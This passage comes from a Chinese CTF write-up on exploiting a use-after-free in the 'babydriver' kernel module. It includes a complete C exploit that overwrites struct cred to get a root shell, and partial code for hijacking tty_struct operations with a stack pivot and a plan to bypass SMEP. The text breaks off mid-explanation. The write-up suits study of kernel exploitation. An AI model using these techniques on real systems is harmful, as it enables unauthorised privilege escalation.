 * %GFP_HIGHUSER
 *  Allocate memory from high memory on behalf of user.
 *
 * Also it is possible to set different flags by OR'ing
 * in one or more of the following additional @flags:
 *
 * %__GFP_HIGH
 *  This allocation has high priority and may use emergency pools.
 *
 * %__GFP_NOFAIL
 *  Indicate that this allocation is in no way allowed to fail
 *  (think twice before using).
 *
 * %__GFP_NORETRY
 *  If memory is not immediately available,
 *  then give up at once.
 *
 * %__GFP_NOWARN
 *  If allocation fails, don't issue any warnings.
 *
 * %__GFP_RETRY_MAYFAIL
 *  Try really hard to succeed the allocation but fail
 *  eventually.
 */
static __always_inline void *kmalloc(size_t size, gfp_t flags)
{
  if (__builtin_constant_p(size)) {
#ifndef CONFIG_SLOB
    unsigned int index;
#endif
    if (size > KMALLOC_MAX_CACHE_SIZE)
      return kmalloc_large(size, flags);
#ifndef CONFIG_SLOB
    index = kmalloc_index(size);

    if (!index)
      return ZERO_SIZE_PTR;

    return kmem_cache_alloc_trace(
        kmalloc_caches[kmalloc_type(flags)][index],
        flags, size);
#endif
  }
  return __kmalloc(size, flags);
}

4) babyrelease

babyrelease 函数的逻辑较为简单，这里只是简单的将 babydev_struct.device_buf 释放掉。

但这里需要注意的是，尽管这里释放了指针所指向的内核空间，但 在释放完成后，该函数既没有对device_buf指针置空，也没有设置 device_buf_len 为0 。

5) babyread

babyread 函数的 IDA 反汇编效果存在错误，这是笔者根据汇编代码修正后的效果：

ssize_t __fastcall babyread(file *filp, char *buffer, size_t length, loff_t *offset)
{
  _fentry__(filp, buffer);
  if ( !babydev_struct.device_buf )
    return -1LL;
  result = -2LL;
  if ( babydev_struct.device_buf_len > length )
  {
    copy_to_user(buffer, babydev_struct.device_buf, length);
    result = length;
  }
  return result;
}

babyread 函数将在判断完当前 device_buf 是否为空之后，将 device_buf 上的内存拷贝至用户空间的 buffer 内存。

6) babywrite

babywrite 功能与 babyread 类似，将用户空间的 buffer 内存上的数据拷贝进内核空间的 device_buf 上，此处不再赘述。该函数修正后的反编译代码如下：

ssize_t __fastcall babywrite(file *filp, const char *buffer, size_t length, loff_t *offset)
{
  _fentry__(filp, buffer);
  if ( !babydev_struct.device_buf )
    return -1LL;
  result = -2LL;
  if ( babydev_struct.device_buf_len > length )
  {
    copy_from_user(babydev_struct.device_buf, buffer, length);
    result = length;
  }
  return result;
}

7) babyioctl

babyioctl 函数的功能类似于 realloc：将原先的 device_buf 释放，并分配一块新的内存。

但这里有个很重要的点需要注意：该位置的 kmalloc 大小可以被用户任意指定，而不是先前 babyopen 中的 64。

e. 获取到的信息

根据上面的分析，最终我们可以得到以下信息：

已开启的保护：

nx
smep

内核模块中可能能利用的点：

babyrelease 释放 device_buf 指针后没有置空，device_buf_len 没有重置为0
babyioctl 可以让 device_buf 重新分配任意大小的内存
当前内核模块中所有用到的变量都是全局变量，这意味着并发性非常的脆弱，或许可以利用一下。

4. 调试前的准备

编写以下 shell 脚本以快速启动调试会话

#!/bin/bash

# 判断当前权限是否为 root，需要高权限以执行 gef-remote --qemu-mode
user=$(env | grep "^USER" | cut -d "=" -f 2)
if [ "$user" != "root"  ]
  then
    echo "请使用 root 权限执行"
    exit
fi

# 静态编译 exp
gcc exp.c -static -o rootfs/exp

# rootfs 打包
pushd rootfs
find . | cpio -o --format=newc > ../rootfs.cpio
popd

# 启动 gdb
gnome-terminal -e 'gdb -x mygdbinit'

# 启动 qemu
qemu-system-x86_64 \
    -initrd rootfs.cpio \
    -kernel bzImage \
    -append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
    -enable-kvm \
    -monitor /dev/null \
    -m 64M \
    --nographic  \
    -smp cores=1,threads=1 \
    -cpu kvm64,+smep \
    -s

exploit 需要静态编译，因为 kernel 不提供标准库，但一定提供 syscall。

获取 vmlinux

我们可以使用 extract-vmlinux 工具，从 bzImage 中解压出 vmlinux。

直接让 gdb 加载 bzImage 时将无法加载到任何 kernel 符号，

因此需要先从 bzImage 中解压出 vmlinux，再来让 gdb 加载符号。
1
2
3
4
wget https://raw.githubusercontent.com/torvalds/linux/master/scripts/extract-vmlinux
chmod +x ./extract-vmlinux
cd CISCN2017-babydriver/babydriver/
../../extract-vmlinux bzImage > vmlinux
但实际上，解压出来的 vmlinux 的函数名称全部为 sub_xxxx，不方便调试。即便所有的内核符号与函数名称的信息全部位于内核符号表中（或者 /proc/kallsyms），但一个个对应过去也相当麻烦。

因此还有一个工具可以使用：vmlinux-to-elf

使用这个工具之前系统中必须装有高于3.5版本的python
1
2
sudo apt install python3-pip
sudo pip3 install --upgrade lz4 git+https://github.com/marin-m/vmlinux-to-elf
使用方式：
1
2
# vmlinux-to-elf <input_kernel.bin> <output_kernel.elf>
vmlinux-to-elf bzImage vmlinux
之后解压出来的 vmlinux 就是带符号的，可以正常被 gdb 读取和下断点。

查看当前 bzImage 所对应的内核版本，并下载该版本的内核代码（如果有需要，想更细致的研究内核的话）

$ strings bzImage | grep "gcc" # 或者 `file bzImage` 命令
4.4.72 (atum@ubuntu) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #1 SMP Thu Jun 15 19:52:50 PDT 2017

$ curl -O -L https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-4.4.72.tar.xz
$ unxz linux-4.4.72.tar.xz
$ tar -xf linux-4.4.72.tar

启动 kernel 后，别忘记在 gdb 中使用 add-symbol-file 加载 ko 的符号：

# in kernel shell:
/ $ lsmod
babydriver 16384 0 - Live 0xffffffffc0000000 (OE)

# in gdb:
gef➤  add-symbol-file babydriver.ko 0xffffffffc0000000

最终设置的 mygdbinit 如下

set architecture i386:x86-64
add-symbol-file vmlinux
gef-remote --qemu-mode localhost:1234

c

# 先 continue， 在 insmod 之后手动 Ctrl+C 再设置断点，免得断点处于 pending 状态
add-symbol-file babydriver.ko 0xffffffffc0000000

b babyread
b babywrite
b babyioctl
b babyopen
b babyrelease

c

5. kernel 的 UAF 利用

a. 覆写 cred 结构体

UAF 的常规利用是通过悬垂指针来修改某块特定内存上的数据，因此在这里我们可以试着：

先让一个悬垂指针指向一块已被释放的内存
执行 fork 操作，使 fork 时给新子进程分配的 struct cred 结构体重新分配这块内存
利用悬垂指针来随意修改这块内存上的 struct cred 结构体，达到提权的效果

struct cred 结构体用于 保存每个进程的权限，其结构如下所示：

/*
 * The security context of a task
 *
 * The parts of the context break down into two categories:
 *
 *  (1) The objective context of a task.  These parts are used when some other
 *  task is attempting to affect this one.
 *
 *  (2) The subjective context.  These details are used when the task is acting
 *  upon another object, be that a file, a task, a key or whatever.
 *
 * Note that some members of this structure belong to both categories - the
 * LSM security pointer for instance.
 *
 * A task has two security pointers.  task->real_cred points to the objective
 * context that defines that task's actual details.  The objective part of this
 * context is used whenever that task is acted upon.
 *
 * task->cred points to the subjective context that defines the details of how
 * that task is going to act upon another object.  This may be overridden
 * temporarily to point to another security context, but normally points to the
 * same context as task->real_cred.
 */
struct cred {
  atomic_t  usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
  atomic_t  subscribers;  /* number of processes subscribed */
  void    *put_addr;
  unsigned  magic;
#define CRED_MAGIC  0x43736564
#define CRED_MAGIC_DEAD  0x44656144
#endif
  kuid_t    uid;    /* real UID of the task */
  kgid_t    gid;    /* real GID of the task */
  kuid_t    suid;    /* saved UID of the task */
  kgid_t    sgid;    /* saved GID of the task */
  kuid_t    euid;    /* effective UID of the task */
  kgid_t    egid;    /* effective GID of the task */
  kuid_t    fsuid;    /* UID for VFS ops */
  kgid_t    fsgid;    /* GID for VFS ops */
  unsigned  securebits;  /* SUID-less security management */
  kernel_cap_t  cap_inheritable; /* caps our children can inherit */
  kernel_cap_t  cap_permitted;  /* caps we're permitted */
  kernel_cap_t  cap_effective;  /* caps we can actually use */
  kernel_cap_t  cap_bset;  /* capability bounding set */
  kernel_cap_t  cap_ambient;  /* Ambient capability set */
#ifdef CONFIG_KEYS
  unsigned char  jit_keyring;  /* default keyring to attach requested
           * keys to */
  struct key __rcu *session_keyring; /* keyring inherited over fork */
  struct key  *process_keyring; /* keyring private to this process */
  struct key  *thread_keyring; /* keyring private to this thread */
  struct key  *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
  void    *security;  /* subjective LSM security */
#endif
  struct user_struct *user;  /* real user ID subscription */
  struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
  struct group_info *group_info;  /* supplementary groups for euid/fsgid */
  struct rcu_head  rcu;    /* RCU deletion hook */
};

新进程的 struct cred 结构体分配的代码位于 _do_fork -> copy_process -> copy_creds -> prepare_creds 函数调用链中。

为了避开繁琐的内存分配利用，精简利用方式，我们只需要让 babydriver 中释放的 device_buf 内存的大小与 sizeof(struct cred)一致即可，这样便可以让内核在为 struct cred 分配内存时，分配到刚释放不久的 device_buf 内存。

由于当前 bzImage 解压出来的 vmlinux 没有结构体符号，因此我们可以直接根据默认参数编译出一个新的 vmlinux，并加载该 vmlinux 来获取 struct cred 结构体的大小：

1 2	gef➤ p sizeof(struct cred) $1 = 0xa8

执行完 babyrelease 函数之后，device_buf就会成为悬垂指针。但需要注意的是，在用户进程空间中，当执行close(fd)之后，该进程将无法再使用这个文件描述符，因此没有办法在close后再利用这个 fd 去进行写操作。

但我们可以利用 babydriver 中的变量全是全局变量的这个特性，同时执行两次 open 操作，获取两个 fd。这样即便一个 fd 被 close 了，我们仍然可以利用另一个 fd 来对 device_buf 进行写操作。

这样一套完整的利用流程就出来了，exploit 如下所示：

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <unistd.h>

int main() {
    int fd1 = open("/dev/babydev", O_RDWR); // alloc
    int fd2 = open("/dev/babydev", O_RDWR); // alloc
    ioctl(fd1, 65537, 0xa8);    // realloc
    close(fd1); // free

    if (!fork()) {
        // child

        // try to overwrite struct cred
        char mem[4 * 7]; // usage uid gid suid sgid euid egid
        memset(mem, '\x00', sizeof(mem));
        write(fd2, mem, sizeof(mem));

        // get shell
        printf("[+] after LPE, privilege: %s\n", (getuid() ? "user" : "root"));
        system("/bin/sh");
    }
    else
        // parent
        waitpid(-1, NULL, 0);

    return 0;
}

需要注意的是，当进程执行完 fork 操作后，父进程必须 wait 子进程，否则当父进程被销毁后，该进程成为孤儿进程，将无法使用终端进行输入输出。

利用结果：

b. Kernel ROP

1) 终端设备类型简介

在 Linux 中 /dev 目录下，终端设备文件通常有以下几种：

注意：以下这些类型的终端不一定在所有发行版 linux 上都存在，例如 /dev/ttyprintk 就不存在于我的 kali linux 上。

串行端口终端（/dev/ttySn）：是用于与串行端口连接的终端设备，类似于 Windows 下的 COM。
控制终端（/dev/tty）：当前进程的控制终端设备文件，类似于符号链接，会具体对应至某个实际终端文件。

可以使用 tty 命令查看其具体对应的终端设备，也可以使用 ps -ax 来查看进程与控制终端的映射关系。

在 qemu 下，可以通过指定-append 'console=ttyS0' 参数，设置 linux kernel tty 映射至 /dev/ttySn 上。
虚拟终端与控制台（/dev/ttyN, /dev/console）：在Linux 系统中，计算机显示器通常被称为控制台终端 (Console)。而在 linux 初始字符界面下，为了同时处理多任务，自然需要多个终端的切换。这些终端由于是用软件来模拟以前硬件的方式，是虚拟出来的，因此也称为虚拟终端。

虚拟终端和控制台的差别需要参考历史。在以前，终端是通过串口连接上的，不是计算机本身就有的设备，而控制台是计算机本身就有的设备，一个计算机只有一个控制台。

简单的说，控制台是直接和计算机相连接的原生设备，终端是通过电缆、网络等等和主机连接的设备

计算机启动的时候，所有的信息都会显示到控制台上，而不会显示到终端上。也就是说，控制台是计算机的基本设备，而终端是附加设备。

由于控制台也有终端一样的功能，控制台有时候也被模糊的统称为终端。

计算机操作系统中，与终端不相关的信息，比如内核消息，后台服务消息，都可以显示到控制台上，但不会显示到终端上。

由于时代的发展，硬件资源的丰富，终端和控制台的概念已经慢慢淡化。

这种虚拟终端的切换与我们X11中图形界面中多个终端的切换不同，它属于更高级别终端的切换。我们日常所使用的图形界面下的终端，属于某个虚拟图形终端界面下的多个伪终端。

可以通过键入 Ctrl+Alt+F1 （其中的 Fx 表示切换至第 x 个终端，例如 F1）来切换虚拟终端。

tty0则是当前所使用虚拟终端的一个别名，系统所产生的信息会发送到该终端上。

默认情况下，F1-F6均为字符终端界面，F7-F12为图形终端界面。

当切换至字符终端界面后，可再次键入 Ctrl+Alt+F7切回图形终端界面。
伪终端（/dev/pty）：伪终端(Pseudo Terminal)是成对的逻辑终端设备，其行为与普通终端非常相似。所不同的是伪终端没有对应的硬件设备，主要目的是实现双向信道，为其他程序提供终端形式的接口。

当我们远程连接到主机时，与主机进行交互的终端的类型就是伪终端，而且日常使用的图形界面中的多个终端也全都是伪终端。

伪终端的两个终端设备分别称为 master 设备和 slave 设备，其中 slave 设备的行为与普通终端无异。

当某个程序把某个 master 设备看作终端设备并进行读写，则该读写操作将实际反应至该逻辑终端设备所对应的另一个 slave 设备。通常 slave 设备也会被其他程序用于读写。因此这两个程序便可以通过这对逻辑终端来进行通信。

现代 linux 主要使用 UNIX 98 pseudoterminals 标准，即 pts(pseudo-terminal slave, /dev/pts/n) 和 ptmx(pseudo-terminal master, /dev/ptmx) 搭配来实现 pty。

伪终端的使用一会将在下面详细说明。
其他终端（诸如 /dev/ttyprintk 等等）。这类终端通常是用于特殊的目的，例如 /dev/ttyprintk 直接与内核缓冲区相连：

2) 伪终端的使用

伪终端的具体实现分为两种

UNIX 98 pseudoterminals，涉及 /dev/ptmx （master）和 /dev/pts/*（slave）
老式 BSD pseudoterminals，涉及 /dev/pty[p-za-e][0-9a-f](master) 和 /dev/tty[p-za-e][0-9a-f](slave)

这里我们只介绍 UNIX 98 pseudoterminals。

/dev/ptmx这个设备文件主要用于打开一对伪终端设备。当某个进程 open 了 /dev/ptmx后，该进程将获取到一个指向 新伪终端master设备（PTM） 的文件描述符，同时对应的 新伪终端slave设备（PTS） 将在 /dev/pts/下被创建。不同进程打开 /dev/ptmx 后所获得到的 PTM、PTS 都是互不相同的。

进程打开 /dev/ptmx 有两种方式

手动使用 open("/dev/ptmx", O_RDWR | O_NOCTTY) 打开

通过标准库函数 getpt

#define _GNU_SOURCE             /* See feature_test_macros(7) */
#include <stdlib.h>

int getpt(void);

通过标准库函数 posix_openpt

#include <stdlib.h>
#include <fcntl.h>

int posix_openpt(int flags);

上述几种方式完全等价，只是使用标准库函数的方式会更通用一点，因为 ptmx 在某些 linux 发行版上可能不位于 /dev/ptmx，同时标准库函数还会做其他额外的检测逻辑。

进程可以调用ptsname(ptm_fd)来获取到对应的 PTS 的路径。

需要注意的是，必须先顺序调用以下两个函数后才能打开 PTS:

grantpt(ptm_fd)：更改 slave 的模式和所有者，获取其所有权
unlockpt(ptm_fd)：对 slave 解锁

伪终端主要用于两个应用场景

终端仿真器，为其他远程登录程序（例如 ssh）提供终端功能
可用于向通常拒绝从管道读取输入的程序（例如 su 和 passwd）发送输入

上述几步是使用伪终端所必须调用的一些底层函数。但在实际的伪终端编程中，更加常用的是以下几个函数：

我们可以通过阅读这些函数的源代码来了解伪终端的使用方式。

openpty：找到一个空闲的伪终端，并将打开好后的 master 和 slave 终端的文件描述符返回。源代码如下:

/* Create pseudo tty master slave pair and set terminal attributes
   according to TERMP and WINP.  Return handles for both ends in
   AMASTER and ASLAVE, and return the name of the slave end in NAME.  */
int
openpty (int *amaster, int *aslave, char *name,
  const struct termios *termp, const struct winsize *winp)
{
#ifdef PATH_MAX
  char _buf[PATH_MAX];
#else
  char _buf[512];
#endif
  char *buf = _buf;
  int master, ret = -1, slave = -1;

  *buf = '\0';

  master = getpt ();
  if (master == -1)
    return -1;

  if (grantpt (master))
    goto on_error;

  if (unlockpt (master))
    goto on_error;

#ifdef TIOCGPTPEER
  /* Try to allocate slave fd solely based on master fd first. */
  slave = ioctl (master, TIOCGPTPEER, O_RDWR | O_NOCTTY);
#endif
  if (slave == -1)
    {
      /* Fallback to path-based slave fd allocation in case kernel doesn't
       * support TIOCGPTPEER.
       */
      if (pts_name (master, &buf, sizeof (_buf)))
        goto on_error;

      slave = open (buf, O_RDWR | O_NOCTTY);
      if (slave == -1)
        goto on_error;
    }

  /* XXX Should we ignore errors here?  */
  if (termp)
    tcsetattr (slave, TCSAFLUSH, termp);
#ifdef TIOCSWINSZ
  if (winp)
    ioctl (slave, TIOCSWINSZ, winp);
#endif

  *amaster = master;
  *aslave = slave;
  if (name != NULL)
    {
      if (*buf == '\0')
        if (pts_name (master, &buf, sizeof (_buf)))
          goto on_error;

      strcpy (name, buf);
    }

  ret = 0;

 on_error:
  if (ret == -1) {
    close (master);

    if (slave != -1)
      close (slave);
  }

  if (buf != _buf)
    free (buf);

  return ret;
}

login_tty：用于实现在指定的终端上启动登录会话。源代码如下所示：

int login_tty (int fd)
{
    // 启动新会话
  (void) setsid();
    // 设置为当前 fd 为控制终端
#ifdef TIOCSCTTY
  if (ioctl(fd, TIOCSCTTY, (char *)NULL) == -1)
    return (-1);
#else
  {
    /* This might work.  */
    char *fdname = ttyname (fd);
    int newfd;
    if (fdname)
      {
        if (fd != 0)
    (void) close (0);
        if (fd != 1)
    (void) close (1);
        if (fd != 2)
    (void) close (2);
        newfd = open (fdname, O_RDWR);
        (void) close (newfd);
      }
  }
#endif
  while (dup2(fd, 0) == -1 && errno == EBUSY)
    ;
  while (dup2(fd, 1) == -1 && errno == EBUSY)
    ;
  while (dup2(fd, 2) == -1 && errno == EBUSY)
    ;
  if (fd > 2)
    (void) close(fd);
  return (0);
}

forkpty：整合了openpty, fork 和 login_tty，在网络服务程序可用于为新登录用户打开一对伪终端，并创建相应的会话子进程。源代码如下：

int
forkpty (int *amaster, char *name, const struct termios *termp,
   const struct winsize *winp)
{
  int master, slave, pid;
  // 启动新 pty
  if (openpty (&master, &slave, name, termp, winp) == -1)
    return -1;

  switch (pid = fork ())
    {
    case -1:
      close (master);
      close (slave);
      return -1;
    case 0:
      /* Child.  */
      close (master);
      if (login_tty (slave))
  _exit (1);

      return 0;
    default:
      /* Parent.  */
      *amaster = master;
      close (slave);

      return pid;
    }
}

3) tty_struct 结构的利用

当我们执行 open("/dev/ptmx", flag) 时，内核会通过以下函数调用链，分配一个 struct tty_struct 结构体：

1
2
3

ptmx_open (drivers/tty/pty.c)
-> tty_init_dev (drivers/tty/tty_io.c)
  -> alloc_tty_struct (drivers/tty/tty_io.c)

struct tty_struct 的结构如下所示：

sizeof(struct tty_struct) == 0x2e0

struct tty_struct {
  int  magic;
  struct kref kref;
  struct device *dev;
  struct tty_driver *driver;
  const struct tty_operations *ops;
  int index;

  /* Protects ldisc changes: Lock tty not pty */
  struct ld_semaphore ldisc_sem;
  struct tty_ldisc *ldisc;

  struct mutex atomic_write_lock;
  struct mutex legacy_mutex;
  struct mutex throttle_mutex;
  struct rw_semaphore termios_rwsem;
  struct mutex winsize_mutex;
  spinlock_t ctrl_lock;
  spinlock_t flow_lock;
  /* Termios values are protected by the termios rwsem */
  struct ktermios termios, termios_locked;
  struct termiox *termiox;  /* May be NULL for unsupported */
  char name[64];
  struct pid *pgrp;    /* Protected by ctrl lock */
  struct pid *session;
  unsigned long flags;
  int count;
  struct winsize winsize;    /* winsize_mutex */
  unsigned long stopped:1,  /* flow_lock */
          flow_stopped:1,
          unused:BITS_PER_LONG - 2;
  int hw_stopped;
  unsigned long ctrl_status:8,  /* ctrl_lock */
          packet:1,
          unused_ctrl:BITS_PER_LONG - 9;
  unsigned int receive_room;  /* Bytes free for queue */
  int flow_change;

  struct tty_struct *link;
  struct fasync_struct *fasync;
  int alt_speed;    /* For magic substitution of 38400 bps */
  wait_queue_head_t write_wait;
  wait_queue_head_t read_wait;
  struct work_struct hangup_work;
  void *disc_data;
  void *driver_data;
  struct list_head tty_files;

#define N_TTY_BUF_SIZE 4096

  int closing;
  unsigned char *write_buf;
  int write_cnt;
  /* If the tty has a pending do_SAK, queue it here - akpm */
  struct work_struct SAK_work;
  struct tty_port *port;
};

注意到第五个字段 const struct tty_operations *ops，struct tty_operations结构体实际上是多个函数指针的集合：

struct tty_operations {
  struct tty_struct * (*lookup)(struct tty_driver *driver,
      struct inode *inode, int idx);
  int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
  void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
  int  (*open)(struct tty_struct * tty, struct file * filp);
  void (*close)(struct tty_struct * tty, struct file * filp);
  void (*shutdown)(struct tty_struct *tty);
  void (*cleanup)(struct tty_struct *tty);
  int  (*write)(struct tty_struct * tty,
          const unsigned char *buf, int count);
  int  (*put_char)(struct tty_struct *tty, unsigned char ch);
  void (*flush_chars)(struct tty_struct *tty);
  int  (*write_room)(struct tty_struct *tty);
  int  (*chars_in_buffer)(struct tty_struct *tty);
  int  (*ioctl)(struct tty_struct *tty,
        unsigned int cmd, unsigned long arg);
  long (*compat_ioctl)(struct tty_struct *tty,
           unsigned int cmd, unsigned long arg);
  void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
  void (*throttle)(struct tty_struct * tty);
  void (*unthrottle)(struct tty_struct * tty);
  void (*stop)(struct tty_struct *tty);
  void (*start)(struct tty_struct *tty);
  void (*hangup)(struct tty_struct *tty);
  int (*break_ctl)(struct tty_struct *tty, int state);
  void (*flush_buffer)(struct tty_struct *tty);
  void (*set_ldisc)(struct tty_struct *tty);
  void (*wait_until_sent)(struct tty_struct *tty, int timeout);
  void (*send_xchar)(struct tty_struct *tty, char ch);
  int (*tiocmget)(struct tty_struct *tty);
  int (*tiocmset)(struct tty_struct *tty,
      unsigned int set, unsigned int clear);
  int (*resize)(struct tty_struct *tty, struct winsize *ws);
  int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
  int (*get_icount)(struct tty_struct *tty,
        struct serial_icounter_struct *icount);
#ifdef CONFIG_CONSOLE_POLL
  int (*poll_init)(struct tty_driver *driver, int line, char *options);
  int (*poll_get_char)(struct tty_driver *driver, int line);
  void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
  const struct file_operations *proc_fops;
};

我们可以试着通过 UAF, 修改新分配的 tty_struct 上的 const struct tty_operations *ops，使其指向一个伪造的 tty_operations结构体，这样就可以搭配一些操作（例如 open、ioctl 等等）来劫持控制流。

注：tty_operations 函数指针的使用，位于drivers/tty/tty_io.c的各类 tty_xxx函数中。

但由于开启了 SMEP 保护，此时的控制流只能在内核代码中执行，不能跳转至用户代码。

4) ROP 利用

为了达到提权目的，我们需要完成以下几件事情：

提权
绕过 SMEP，执行用户代码

4.1) 劫持栈指针

我们需要通过 ROP 来完成上述操作，但问题是，用户无法控制内核栈。因此我们必须使用一些特殊 gadget 来将栈指针劫持到用户空间，之后再利用用户空间上的 ROP 链进行一系列控制流跳转。

获取 gadget 的方式有很多。可以使用之前用的 ROPgadget 工具，优点是可以将分析结果通过管道保存至文件中，但缺点是该工具在 kernel 层面上会跑的很慢。

1	ROPgadget --binary vmlinux

有个速度比较快的工具可以试试，那就是 ropper工具：

1 2	pip3 install ropper ropper --file vmlinux --console

我们可以手动构造一个 fake_tty_operations，并修改其中的 write 函数指针指向一个 xchg 指令。这样当对 /dev/ptmx 执行 write 操作时，内核就会通过以下调用链：

tty_write -> do_tty_write -> do_tty_write -> n_tty_write -> tty->ops->write

进一步使用到 tty->ops->write函数指针，最终执行 xchg 指令。

但问题是，执行什么样的 xchg 指令？通过动态调试与 IDA 静态分析，最终找到了实际调用 tty->ops->write的指令位置：

1	.text:FFFFFFFF814DC0C3 call qword ptr [rax+38h]

由于当控制流执行至此处时，只有 %rax 是用户可控的（即fake_tty_operations基地址），因此我们尝试使用以下 gadget，劫持 %rsp 指针至用户空间：

1	0xffffffff8100008a : xchg eax, esp ; ret

注意：xchg eax, esp将清空两个寄存器的高位部分。因此执行完成后，%rsp 的高四字节为0，此时指向用户空间。我们可以使用 mmap 函数占据这块内存，并放上 ROP 链。

以下是劫持栈指针的部分代码：

int fd1 = open("/dev/babydev", O_RDWR);
int fd2 = open("/dev/babydev", O_RDWR);
ioctl(fd1, 65537, 0x2e0);

close(fd1);

// 申请 tty_struct
int master_fd = open("/dev/ptmx", O_RDWR);

// 构造一个 fake tty_operators
u_int64_t fake_tty_ops[] = {
    0, 0, 0, 0, 0, 0, 0,
    xchg_eax_esp_addr, // int  (*write)(struct tty_struct*, const unsigned char *, int)
};
printf("[+] fake_tty_ops constructed\n");

u_int64_t hijacked_stack_addr = ((u_int64_t)fake_tty_ops & 0xffffffff);
printf("[+] hijacked_stack addr: %p\n", (char*)hijacked_stack_addr);

char* fake_stack = NULL;
if ((fake_stack = mmap(
    (char*)(hijacked_stack_addr & (~0xfff)),    // addr, 页对齐
    0x1000,                                     // length
    PROT_READ | PROT_WRITE,                     // prot
    MAP_PRIVATE | MAP_ANONYMOUS,                // flags
    -1,                                         // fd
    0)                                          // offset
    ) == MAP_FAILED)  
    perror("mmap");

// 调试时先装载页面
fake_stack[0] = 0;
printf("[+]     fake_stack addr: %p\n", fake_stack);

// 读取 tty_struct 结构体的所有数据
int ops_ptr_offset = 4 + 4 + 8 + 8;
char overwrite_mem[ops_ptr_offset + 8];
char** ops_ptr_addr = (char**)(overwrite_mem + ops_ptr_offset);

read(fd2, overwrite_mem, sizeof(overwrite_mem));
printf("[+] origin ops ptr addr: %p\n", *ops_ptr_addr);

// 修改并覆写 tty_struct 结构体
*ops_ptr_addr = (char*)fake_tty_ops;
write(fd2, overwrite_mem, sizeof(overwrite_mem));
printf("[+] hacked ops ptr addr: %p\n", *ops_ptr_addr);

// 触发 tty_write
// 注意使用 write 时， buf 指针必须有效，否则会提前返回 EFAULT
int buf[] = {0};
write(master_fd, buf, 8);

可以看到栈指针已经成功被劫持到用户空间中：

4.2) 关闭 SMEP + ret2usr提权

劫持栈指针后，我们现在可以尝试提权。正常来说，在内核里需要执行以下代码来进行提权：

1 2	struct cred * root_cred = prepare_kernel_cred(NULL); commit_creds(root_cred);

其中，prepare_kernel_cred函数用于获取传入 task_struct 结构指针的 cred 结构。需要注意的是，如果传入的指针是 NULL，则函数返回的 cred 结构将是 init_cred，其中uid、gid等等均为 root 级别。

commit_creds函数用于将当前进程的 cred 更新为新传入的 cred 结构，如果我们将当前进程的 cred 更新为 root 等级的 cred，则达到我们提权的目的。

为了利用简便，我们可以先关闭 SMEP，跳转进用户代码中直接执行预编译好的提权指令。

SMEP 标志在寄存器 CR4 上，因此我们可以通过重设 CR4 寄存器来关闭 SMEP，最后提权：

我们先看一下当前的 cr4 寄存器的值

之后只要将 cr4 覆盖为 0x6f0 即可。

4.3) 返回用户态 + get shell

当我们提权了当前进程后，剩下要做的事情就是返回至用户态并启动新shell。

可能有小伙伴会问，既然都劫持了内核控制流了，那是不是可以直接启动 shell ？为什么还要返回至用户态？

个人的理解是，劫持内核控制流后，由于改变了内核的正常运行逻辑，因此此时内核鲁棒性降低，稍微敏感的一些操作都有可能会导致内核挂掉。最稳妥的方式是回到更加稳定的用户态中，而且 root 权限的用户态程序同样可以做到内核权限所能做到的事情。

除了上面所说的以外，还有一个很重要的原因是：一般情况下在用户空间构造特定目的的代码要比在内核空间简单得多。

如何从内核态返回至用户态中？我们可以从 syscall 的入口代码入手，先看看这部分代码：

ENTRY(entry_SYSCALL_64)
  SWAPGS_UNSAFE_STACK
GLOBAL(entry_SYSCALL_64_after_swapgs)
  movq  %rsp, PER_CPU_VAR(rsp_scratch)
  movq  PER_CPU_VAR(cpu_current_top_of_stack), %rsp

  /* Construct struct pt_regs on stack */
  pushq  $__USER_DS      /* pt_regs->ss */
  pushq  PER_CPU_VAR(rsp_scratch)  /* pt_regs->sp */

  ENABLE_INTERRUPTS(CLBR_NONE)
  pushq  %r11        /* pt_regs->flags */
  pushq  $__USER_CS      /* pt_regs->cs */
  pushq  %rcx        /* pt_regs->ip */
  pushq  %rax        /* pt_regs->orig_ax */
  pushq  %rdi        /* pt_regs->di */
  pushq  %rsi        /* pt_regs->si */
  pushq  %rdx        /* pt_regs->dx */
  pushq  %rcx        /* pt_regs->cx */
  pushq  $-ENOSYS      /* pt_regs->ax */
  pushq  %r8        /* pt_regs->r8 */
  pushq  %r9        /* pt_regs->r9 */
  pushq  %r10        /* pt_regs->r10 */
  pushq  %r11        /* pt_regs->r11 */
  sub  $(6*8), %rsp      /* pt_regs->bp, bx, r12-15 not saved */

可以看到，控制流以进入入口点后，并立即执行swapgs指令，将当前 GS 寄存器切换成 kernel GS，之后切换栈指针至内核栈，并在内核栈中构造结构体 pt_regs。

该结构体声明如下：

struct pt_regs {
/*
 * C ABI says these regs are callee-preserved. They aren't saved on kernel entry
 * unless syscall needs a complete, fully filled "struct pt_regs".
 */
  unsigned long r15;
  unsigned long r14;
  unsigned long r13;
  unsigned long r12;
  unsigned long rbp;
  unsigned long rbx;
/* These regs are callee-clobbered. Always saved on kernel entry. */
  unsigned long r11;
  unsigned long r10;
  unsigned long r9;
  unsigned long r8;
  unsigned long rax;
  unsigned long rcx;
  unsigned long rdx;
  unsigned long rsi;
  unsigned long rdi;
/*
 * On syscall entry, this is syscall#. On CPU exception, this is error code.
 * On hw interrupt, it's IRQ number:
 */
  unsigned long orig_rax;
/* Return frame for iretq */
  unsigned long rip;
  unsigned long cs;
  unsigned long eflags;
  unsigned long rsp;
  unsigned long ss;
/* top of stack page */
};

结合动态调试可以发现，在控制流到达 syscall 入口点之前，pt_regs结构体中的 rip、cs、eflags、rsp 以及 ss 五个寄存器均已压栈。

我们还可以在该文件中找到下面的代码片段

opportunistic_sysret_failed:
  SWAPGS
  jmp  restore_c_regs_and_iret
  
[...]

/*
 * At this label, code paths which return to kernel and to user,
 * which come from interrupts/exception and from syscalls, merge.
 */
GLOBAL(restore_regs_and_iret)
  RESTORE_EXTRA_REGS
restore_c_regs_and_iret:
